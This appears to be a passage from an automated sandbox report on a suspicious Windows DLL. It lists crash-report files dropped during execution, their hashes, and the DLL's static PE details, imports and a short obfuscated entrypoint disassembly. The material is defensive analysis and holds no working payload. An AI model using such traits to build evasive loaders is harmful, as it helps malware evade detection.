                                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.2.0.6.7.8.3.8.8.6.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.5.8.1.8.f.d.-.3.f.c.6.-.4.8.d.b.-.8.4.9.0.-.d.1.9.4.1.4.3.1.0.1.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.e.f.3.0.8.9.-.3.2.f.a.-.4.6.0.8.-.8.2.6.c.-.e.1.7.6.1.2.c.e.b.f.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.c.4.-.0.0.0.1.-.0.0.1.c.-.2.3.d.c.-.a.a.d.a.c.0.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fb9152841665ded0dbf17d9a73851f865888cee_82810a17_168461a0\Report.wer
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):0.9651697352998475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:7dv6iD0oXPCHBUZMX4jed+JU/u7sxS274ItWc:Rv6idXSBUZMX4je//u7sxX4ItWc
                                                                                                                                                MD5:D599339891655D6254BF62FE10A78944
                                                                                                                                                SHA1:4FAF72D52A6FB4F891A9ABD30EC3909AE7A878D0
                                                                                                                                                SHA-256:90151AC6D1A756A1E8D302CADFA11C67F9C1356E188C11CA62012DD49AD9AFC0
                                                                                                                                                SHA-512:D21BA0B4483D38A3EBD255D5E0E6F9283158E3DCA1AA29C5A8D479E1632B95D7F0B27EA68EEB1031733699B6F9AC83A3EC86CD633E45EF77F2A047DE6C643984
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.2.0.6.3.8.7.1.2.2.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.5.0.4.2.0.6.8.4.1.8.0.8.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.9.1.e.f.f.0.-.e.3.a.9.-.4.b.a.9.-.b.6.9.e.-.0.a.a.4.2.7.d.b.6.c.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.6.3.7.2.9.0.-.2.c.2.e.-.4.6.6.b.-.b.9.f.b.-.3.7.3.7.3.9.0.d.7.5.1.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.7.c.-.0.0.0.1.-.0.0.1.c.-.1.a.9.7.-.a.e.d.a.c.0.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A30.tmp.dmp
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 27 01:27:45 2021, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47434
                                                                                                                                                Entropy (8bit):2.089972974158097
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:QjuMBqmBiU0zx+IbO5SkbuGssI+uOksRyWfJ9BRYf4ynhVGkoFbE0mnrK:gq5UG+15LbuGssIk9g4ynTGkyHmnrK
                                                                                                                                                MD5:1DFA4E8F9E2D879586116D458E321E87
                                                                                                                                                SHA1:3F7F518F7C55A9BCFBECE1ACF9FA8E2DF6EE7838
                                                                                                                                                SHA-256:EB14E0288F47EAE18EFEC8D3849AAF1BEF74CBF03C9C50CCB0211F0A3D113096
                                                                                                                                                SHA-512:BCE1008E74F16A52EA535CA4EEE287CFDB97EC00EB19C79B8A6339EBC7812138C2D86DA2868FAFE2295843E4DD9D7052A81EE505A09D653935238B1FA052BCFB
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MDMP....... ..........a........................`................1..........T.......8...........T...............R............................................................................................U...........B....... ......GenuineIntelW...........T.......|...h..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5201.tmp.WERInternalMetadata.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8270
                                                                                                                                                Entropy (8bit):3.693943868682352
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Rrl7r3GLNi466B6Y3s6fB2gmfT4DS7Cpry89b95psfCQX5m:RrlsNi96B6Yc6p2gmfTMSY95CfCI0
                                                                                                                                                MD5:1FF324457E7728C5BE90DF5B2613103E
                                                                                                                                                SHA1:827B125771E315405BD68CA1CE4AF1B194830E01
                                                                                                                                                SHA-256:1F9FF71BF40348304DD8F27406FF2DF60F5004F4ACB80E9EC8807B8A12FFC37B
                                                                                                                                                SHA-512:58DAB421D51B90EDF3676C663CDD4B36CCEC92FCA5061798F07B86FDC0E207DA846263C4E412B34250B8D48B52799AD6824A22BBFA6E2793CEF42BADB07DC057
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.8.8.<./.P.i.d.>.......
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C1.tmp.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4630
                                                                                                                                                Entropy (8bit):4.459475558463607
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwSD8zsYJgtWI9acWSC8BCM8fm8M4JCdsKDF3L+q8/bnV4SrSVd:uITfeZVSNMxJQLgDWVd
                                                                                                                                                MD5:F799FB0FD596A725DDCC1D3DF9DAACED
                                                                                                                                                SHA1:4A271A3432B71581C010D8EF7A7DA366E70F7DC4
                                                                                                                                                SHA-256:DAFF5ED97F257E6F2453BFA4A13FFF11D1C25C5283D6ADAF89140123618E3496
                                                                                                                                                SHA-512:3477196C7F55DFD8BB24B0DE3043D85F699DE43086BD2B896721250138427A64287143A7545521C357A5E753A7BDBAA42C6C7A04F3F72596E40AB8861ED9577B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315358" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER59B1.tmp.dmp
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 27 01:27:50 2021, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):50532
                                                                                                                                                Entropy (8bit):2.124326452281166
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:29ugbqVKFhV2vj/Ef5O5SkbqiloDkqHmHMvGWj3HcUcW5+:LVSsr/q85LbqSneG6ncWg
                                                                                                                                                MD5:91E23ED71E3B58E5EF808982D171F677
                                                                                                                                                SHA1:3DE1EECA62BBBD8E51C878405D3990187071C11D
                                                                                                                                                SHA-256:0575CC672BFEAEB4E346D305AA36BEDE2B30CEF9B754FBA610BE09079D2CF221
                                                                                                                                                SHA-512:4EE5E844265C64C72D5720CF296E05E8D55FAF1E2F0012139CADDF94D0B79A674ACFA35F4056FCD73CA46037906FA10FDB925BB8EA45CF0E30F6030B10A11E2B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MDMP....... ..........a........................|...........$...$ ...........4..........`.......8...........T...........H"..............H ..........4"...................................................................U...........B......."......GenuineIntelW...........T...........h..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER656A.tmp.WERInternalMetadata.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8350
                                                                                                                                                Entropy (8bit):3.68971409405603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Rrl7r3GLNikF6i6YI66Qvgmf8xSwCpB789b9nysfxAXnm:RrlsNie6i6Yt6Ygmf8xSW9nxfam
                                                                                                                                                MD5:0332A2E72E7BB508D64678E5061D1AE0
                                                                                                                                                SHA1:0373BF515A54A7AD057E99FC6521431EEABEBCE3
                                                                                                                                                SHA-256:809AF7D048EDD6CEA31973B7F677488127587C25BBD63FE091CD76EA418F5DB5
                                                                                                                                                SHA-512:0E7C000A802F9B539D507CFAF42505007C60DFACF353853568328C6FFF9B8066F067A8736046605DEF2D03EF1A57A2F5D2C4D343E8BE078A359027464B18A302
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.4.0.<./.P.i.d.>.......
                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER68B7.tmp.xml
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4731
                                                                                                                                                Entropy (8bit):4.443766600628613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwSD8zsYJgtWI9acWSC8BI8fm8M4JCdsK7Ff8+q8vjsKp4SrSSd:uITfeZVSNbJvKzDWSd
                                                                                                                                                MD5:62007515FD1454403F933BA85C3AA38F
                                                                                                                                                SHA1:29C81AC3A501EB2C35CECA757B81906E2EB4F3B3
                                                                                                                                                SHA-256:5F16E55D31CA10A5B32119D1D0BD5F704BA780663729BE82C5B8CD50D0D48BB8
                                                                                                                                                SHA-512:CC4A38E56C4F4D60D4FCB312E5719877C3A319D56C41B3AA33D843C8738C2766824F60A66925A67507AE576D2114A785896723F0F4A8017B606B31BCDF82938A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315358" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1572864
                                                                                                                                                Entropy (8bit):4.278251829968785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:LveNC46gDrh7xM5E+mHAzjA4/yfMhdTjXOH0K3QZGRAXWv0BhcLJnW:reNC46gDrh7xM5IR
                                                                                                                                                MD5:F1EEDE3884835CB30D08C5C778213538
                                                                                                                                                SHA1:88A6A24CC0A2C596276DAB87A052ED38B49E5651
                                                                                                                                                SHA-256:2D5815003642357A42A131ECC5B8975053D7F77170AC1E664A222F1BB92AEB2A
                                                                                                                                                SHA-512:E7F01F2222C0D6F0841D4E58DFA26463E77230DED5A48BD95D5562B6AE9125EF0B10F7D6883B4A55389FF73D64C518DB2C37901D03074173F7FA8DE600DA1A18
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&"...................................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24576
                                                                                                                                                Entropy (8bit):4.036587068153938
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:D+1XJ5Rftx1pPJ4XmsFcnE7kKPBqXZSeq5QMVyi6+/gl4Lk49Zd1DoXznwXvwvo:K1XXRftx15J4XjFcE77BqXAeq5QMVyic
                                                                                                                                                MD5:186F9B0626F31F86600410AD679039E4
                                                                                                                                                SHA1:530359F4036224E5A0178952A2C3FC2124F07216
                                                                                                                                                SHA-256:6B0EB4872D3040CF239052A380E1EA8F00A942970D2D4C4D9531604F4F972B38
                                                                                                                                                SHA-512:1B91DFC012C93AD2A8AA17C9E7F0DEBA46579A85C438F15E498C51E53E4A8A9C89CABEC3F350CC0AE6A27B0F03870FECEE46DE7B3A37236C306D8BD71FEEC614
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&"...................................................................................................................................................................................................................................................................................................................................................k..HvLE.^......Y...........y..l.l..q................0................... ..hbin................p.\..,..........nk,.s....................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .s........... ........................... .......Z.......................Root........lf......Root....nk .s........................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.269389698652151
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:L0mddDYjoL.dll
                                                                                                                                                File size:536576
                                                                                                                                                MD5:0d9cc367aa4abc5620b6fcf8e9272f53
                                                                                                                                                SHA1:cb6db576bbe636a895d0ad3e3136483d0ec777be
                                                                                                                                                SHA256:1bd2e431f2631a5bfc21a9e244bb28d4230dad825b9d6396afcd32458923fb0a
                                                                                                                                                SHA512:f827b80e02a9fd180c6bc6d4261c1ce09d42f301f3137420942b8308688de5bbc6ed9d5945388f3ba5ac877f2211b5088b48fb72c8db10b97b81f0fdf60eb655
                                                                                                                                                SSDEEP:6144:yKMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:y9hXAg5aX0CL8fI
                                                                                                                                                File Content Preview:MZ......................@...................................P......E;...;...;....Xl.....................2.4.^....uh.{...6.F......Xl.....F.z..............u..........z.......................@...8.{.G...;.......Rich;..........................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x10005a10
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x10000000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:e9192d34e4c9dcdf739aaa1d74025eb2

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                mov edx, 00000003h
                                                                                                                                                cmpps xmm1, xmm0, 02h
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                add eax, 0Ch
                                                                                                                                                cmp edx, 03h
                                                                                                                                                je 00007FD9B11697C2h
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push edi
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                and esp, FFFFFFF8h
                                                                                                                                                sub esp, 000000A0h
                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                mov ecx, 006B34C2h
                                                                                                                                                mov edx, dword ptr [esp+7Ch]
                                                                                                                                                mov dword ptr [esp+7Ch], 3CDA3086h
                                                                                                                                                mov dword ptr [esp+00000094h], 00000000h
                                                                                                                                                mov dword ptr [esp+00000090h], 006C4587h
                                                                                                                                                mov byte ptr [esp+7Ah], FFFFFFBDh
                                                                                                                                                mov dword ptr [esp+74h], 629729F9h
                                                                                                                                                mov byte ptr [esp+65h], FFFFFFF1h
                                                                                                                                                mov dword ptr [esp+38h], 694CC273h
                                                                                                                                                mov esi, dword ptr [esp+00000094h]
                                                                                                                                                mov edi, dword ptr [esp+00000090h]
                                                                                                                                                mov ebx, edi
                                                                                                                                                add ebx, 171E5389h
                                                                                                                                                mov dword ptr [esp+30h], eax
                                                                                                                                                mov eax, esi
                                                                                                                                                adc eax, 00000000h
                                                                                                                                                mov dword ptr [esp+48h], ebx
                                                                                                                                                mov dword ptr [esp+4Ch], eax
                                                                                                                                                mov dword ptr [esp+2Ch], edi
                                                                                                                                                mov dword ptr [esp+28h], ecx
                                                                                                                                                mov dword ptr [esp+24h], edx
                                                                                                                                                mov dword ptr [esp+20h], esi
                                                                                                                                                call 00007FD9B116D1C6h
                                                                                                                                                mov ecx, 4C276534h
                                                                                                                                                mov edx, dword ptr [esp+2Ch]

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x780d00x64.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x781b00x17c.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x2f0.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x830000x1214.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x90f00x38.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x90000xe8.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x74d80x8000False0.360137939453data4.61046868402IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x90000x6fb7f0x70000False0.311187744141data7.37787835354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x790000x80f40x7000False0.295828683036data6.02916609898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x820000x2f00x1000False0.090087890625data0.784979301457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x830000x12140x2000False0.287475585938data4.27724948186IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_VERSION0x820600x290MS Windows COFF PA-RISC object fileEnglishUnited States

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllCreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable
                                                                                                                                                msvcrt.dllwcscoll
                                                                                                                                                SETUPAPI.dllSetupDiOpenDeviceInterfaceW
                                                                                                                                                WININET.dllInternetReadFile
                                                                                                                                                RPCRT4.dllRpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo
                                                                                                                                                LZ32.dllLZCopy
                                                                                                                                                USER32.dllBlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA
                                                                                                                                                NTDSAPI.dllDsGetDomainControllerInfoW
                                                                                                                                                IPHLPAPI.DLLGetIpAddrTable
                                                                                                                                                WS2_32.dllWSACleanup, inet_addr
                                                                                                                                                IMM32.dllImmGetCandidateListW
